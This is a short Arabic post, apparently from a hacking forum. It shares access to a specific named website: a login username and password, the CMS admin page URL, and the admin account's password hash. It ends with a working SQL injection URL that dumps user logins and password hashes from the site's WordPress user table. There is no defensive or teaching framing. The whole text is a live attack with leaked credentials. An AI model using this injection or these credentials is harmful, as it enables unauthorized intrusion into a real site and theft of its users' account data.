هذا اليوزر
havokah
وهذا الباسبورد
havokah
وهذي الصفحه
http://www.jerusalemite.org/home/cms/index.php
اما بالنسبه لباسبورد الادمن
اليوزر admin
الباسبورد
8fc7026ff73582b7c83196290a3811bc
الاستغلال
كود PHP:
http://www.jerusalemite.org/home/event.php?id=148211+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3a),8,9,10,11,12,13,14,15,16,17+from+wp_users--